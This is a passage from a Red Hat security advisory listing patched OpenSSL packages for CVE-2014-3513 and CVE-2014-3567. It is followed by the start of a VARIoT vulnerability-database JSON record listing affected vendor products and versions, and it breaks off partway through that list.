Red Hat Enterprise Linux Workstation (v. 6):

Source: openssl-1.0.1e-30.el6_6.2.src.rpm

i386: openssl-1.0.1e-30.el6_6.2.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.2.i686.rpm openssl-devel-1.0.1e-30.el6_6.2.i686.rpm

Red Hat Enterprise Linux Workstation Optional (v. 6):

i386: openssl-debuginfo-1.0.1e-30.el6_6.2.i686.rpm openssl-perl-1.0.1e-30.el6_6.2.i686.rpm openssl-static-1.0.1e-30.el6_6.2.i686.rpm

x86_64: openssl-debuginfo-1.0.1e-30.el6_6.2.x86_64.rpm openssl-perl-1.0.1e-30.el6_6.2.x86_64.rpm openssl-static-1.0.1e-30.el6_6.2.x86_64.rpm

Red Hat Enterprise Linux Client (v. 7):

Source: openssl-1.0.1e-34.el7_0.6.src.rpm

x86_64: openssl-1.0.1e-34.el7_0.6.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.6.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.6.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.6.i686.rpm openssl-libs-1.0.1e-34.el7_0.6.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64: openssl-debuginfo-1.0.1e-34.el7_0.6.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.6.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.6.i686.rpm openssl-devel-1.0.1e-34.el7_0.6.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.6.x86_64.rpm openssl-static-1.0.1e-34.el7_0.6.i686.rpm openssl-static-1.0.1e-34.el7_0.6.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source: openssl-1.0.1e-34.el7_0.6.src.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

Red Hat Enterprise Linux Server (v. 7):

Source: openssl-1.0.1e-34.el7_0.6.src.rpm

ppc64: openssl-1.0.1e-34.el7_0.6.ppc64.rpm openssl-debuginfo-1.0.1e-34.el7_0.6.ppc.rpm openssl-debuginfo-1.0.1e-34.el7_0.6.ppc64.rpm openssl-devel-1.0.1e-34.el7_0.6.ppc.rpm openssl-devel-1.0.1e-34.el7_0.6.ppc64.rpm openssl-libs-1.0.1e-34.el7_0.6.ppc.rpm openssl-libs-1.0.1e-34.el7_0.6.ppc64.rpm

s390x: openssl-1.0.1e-34.el7_0.6.s390x.rpm openssl-debuginfo-1.0.1e-34.el7_0.6.s390.rpm openssl-debuginfo-1.0.1e-34.el7_0.6.s390x.rpm openssl-devel-1.0.1e-34.el7_0.6.s390.rpm openssl-devel-1.0.1e-34.el7_0.6.s390x.rpm openssl-libs-1.0.1e-34.el7_0.6.s390.rpm openssl-libs-1.0.1e-34.el7_0.6.s390x.rpm

x86_64: openssl-1.0.1e-34.el7_0.6.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.6.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.6.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.6.i686.rpm openssl-devel-1.0.1e-34.el7_0.6.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.6.i686.rpm openssl-libs-1.0.1e-34.el7_0.6.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64: openssl-debuginfo-1.0.1e-34.el7_0.6.ppc.rpm openssl-debuginfo-1.0.1e-34.el7_0.6.ppc64.rpm openssl-perl-1.0.1e-34.el7_0.6.ppc64.rpm openssl-static-1.0.1e-34.el7_0.6.ppc.rpm openssl-static-1.0.1e-34.el7_0.6.ppc64.rpm

s390x: openssl-debuginfo-1.0.1e-34.el7_0.6.s390.rpm openssl-debuginfo-1.0.1e-34.el7_0.6.s390x.rpm openssl-perl-1.0.1e-34.el7_0.6.s390x.rpm openssl-static-1.0.1e-34.el7_0.6.s390.rpm openssl-static-1.0.1e-34.el7_0.6.s390x.rpm

x86_64: openssl-debuginfo-1.0.1e-34.el7_0.6.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.6.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.6.x86_64.rpm openssl-static-1.0.1e-34.el7_0.6.i686.rpm openssl-static-1.0.1e-34.el7_0.6.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source: openssl-1.0.1e-34.el7_0.6.src.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package

References:

https://www.redhat.com/security/data/cve/CVE-2014-3513.html https://www.redhat.com/security/data/cve/CVE-2014-3567.html https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/articles/1232123

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iD8DBQFUP940XlSAg2UNWIIRAhUYAJ4or1rZ25E0BXjTPyeDsN+keTz3twCdHDEz qY686VXQQ02SLq5vTvKfuHk= =McEc -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201410-0371",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1d"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1c"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1b"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1g"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1i"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1h"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1e"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1a"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1f"
      },
      {
        "model": "bladecenter advanced management module 3.66n",
        "scope": "ne",
        "trust": 0.9,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "bladecenter advanced management module 3.66k",
        "scope": null,
        "trust": 0.9,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "global console manager",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "ibm",
        "version": "1.26.1.23978"
      },
      {
        "model": "global console manager",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "ibm",
        "version": "1.4.2.15036"
      },
      {
        "model": "global console manager",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "ibm",
        "version": "1.20.20.23447"
      },
      {
        "model": "project openssl 1.0.0a",
        "scope": null,
        "trust": 0.6,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "local console manager",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "ibm",
        "version": "1.2.39.0"
      },
      {
        "model": "local console manager",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "ibm",
        "version": "1.2.27.00"
      },
      {
        "model": "local console manager",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "ibm",
        "version": "1.2.40.00"
      },
      {
        "model": "cognos controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5.1"
      },
      {
        "model": "security network intrusion prevention system gx7412-05",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "aura collaboration environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.0"
      },
      {
        "model": "security network intrusion prevention system gx5108-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "upward integration modules for vmware vsphere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.5"
      },
      {
        "model": "rational software architect realtime edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1"
      },
      {
        "model": "bladecenter advanced management module 25r5778",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "q",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "16200"
      },
      {
        "model": "security network intrusion prevention system gx5208-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "bladecenter -s",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1948"
      },
      {
        "model": "flex system fc3171 8gb san pass-thru",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.3"
      },
      {
        "model": "security network intrusion prevention system gx4004",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "k",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "upward integration modules scvmm add-in",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.3"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.0"
      },
      {
        "model": "project openssl 0.9.8f",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "58200"
      },
      {
        "model": "system management homepage",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4.1"
      },
      {
        "model": "security network intrusion prevention system gx5108",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "switch series r1809p03",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5820"
      },
      {
        "model": "project openssl 1.0.0d",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "cloudsystem matrix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4"
      },
      {
        "model": "project openssl 1.0.1e",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx5008",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.2"
      },
      {
        "model": "project openssl beta3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "vcenter server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.1"
      },
      {
        "model": "insight control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3"
      },
      {
        "model": "security network intrusion prevention system gx5108-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "project openssl 1.0.1a",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "msr4000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "systems director storage control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.1.0"
      },
      {
        "model": "project openssl b",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "aspera shares",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "1.7.5"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.1"
      },
      {
        "model": "mcp r3303p18",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6600"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.5.0.1"
      },
      {
        "model": "security network intrusion prevention system gx5108",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "msr3000 r0106p18",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "project openssl k",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "security network intrusion prevention system gx3002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "security network intrusion prevention system gx5008",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2.0.0"
      },
      {
        "model": "project openssl 1.0.0g",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "sle client tools",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "tivoli netcool/reporter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "850/8700"
      },
      {
        "model": "insight control server provisioning",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.1"
      },
      {
        "model": "r5203p11",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3100v2"
      },
      {
        "model": "f5000-s",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "msr1000 r2513p33",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.3.1"
      },
      {
        "model": "netscaler t1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "project openssl 0.9.8zb",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "esxi",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.1"
      },
      {
        "model": "msr9xx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "j",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "58300"
      },
      {
        "model": "project openssl 1.0.1j",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.2"
      },
      {
        "model": "upward integration modules for vmware vsphere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.1"
      },
      {
        "model": "tivoli dynamic workload console",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.6.0.0"
      },
      {
        "model": "wb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "2.3"
      },
      {
        "model": "security network intrusion prevention system gx7412",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.3"
      },
      {
        "model": "image construction and composition tool",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.3.1.0"
      },
      {
        "model": "n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "project openssl 1.0.0o",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "pa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "aspera",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "3.5.2"
      },
      {
        "model": "matrix operating environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3"
      },
      {
        "model": "m210",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "vsr1000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "r15xx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "19100"
      },
      {
        "model": "project openssl 0.9.8w",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gv200",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "cognos tm1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5.2"
      },
      {
        "model": "switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "119000"
      },
      {
        "model": "flex system fc3171 8gb san switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.4"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.1.0"
      },
      {
        "model": "switch series r5319p10",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3610"
      },
      {
        "model": "project openssl 1.0.0m",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3.1"
      },
      {
        "model": "msr1000 russian version r2513l40.ru",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "rational application developer for websphere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1"
      },
      {
        "model": "project openssl 1.0.1g",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5.0"
      },
      {
        "model": "project openssl 0.9.8m",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "f5000-c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "project openssl j",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "rational application developer for websphere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "security network intrusion prevention system gx4004",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "security virtual server protection for vmware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.1"
      },
      {
        "model": "security network intrusion prevention system gv1000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "tivoli dynamic workload console",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.2"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.1"
      },
      {
        "model": "command center appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "aspera shares",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "1.0.1"
      },
      {
        "model": "bladecenter -t",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8720"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.3.23"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.5.0.2"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.2.1"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.2.4"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "a6600",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "netscaler gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "project openssl 1.0.1i",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "r1828p06",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "12500"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.2"
      },
      {
        "model": "r2122",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7900"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.0"
      },
      {
        "model": "project openssl 1.0.0h",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx3002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.1.1"
      },
      {
        "model": "u200s and cs f5123p30",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx5108",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.5.0.0"
      },
      {
        "model": "security network intrusion prevention system gv200",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.1.1"
      },
      {
        "model": "security network intrusion prevention system gx5008-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "security network intrusion prevention system gx5008",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.3"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.1"
      },
      {
        "model": "bladecenter -s",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8886"
      },
      {
        "model": "security network intrusion prevention system gx7800",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "security network intrusion prevention system gx7412-10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.0"
      },
      {
        "model": "office connect ps1810",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "qradar siem mr2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "aura communication manager ssp04",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "tivoli workload scheduler distributed fp03",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.6.0"
      },
      {
        "model": "upward integration modules for microsoft system center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.5.2"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.7"
      },
      {
        "model": "project openssl 0.9.8r",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "ex series network switches for ibm products pre 12.3r9",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "tivoli dynamic workload console",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "tivoli workload scheduler distributed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5.1"
      },
      {
        "model": "f1000-a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "aspera faspex",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "3.0.3"
      },
      {
        "model": "security network intrusion prevention system gx3002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "hsr6602 r3303p18",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "m.10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.1.3"
      },
      {
        "model": "project openssl 0.9.8n",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "a6600 russian version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "virtual connect enterprise manager sdk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "79000"
      },
      {
        "model": "aspera proxy",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "1.2.3"
      },
      {
        "model": "si switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "51200"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3"
      },
      {
        "model": "security network intrusion prevention system gv200",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "cloudsystem matrix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "f1000-s",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "project openssl 0.9.8y",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3100v2-480"
      },
      {
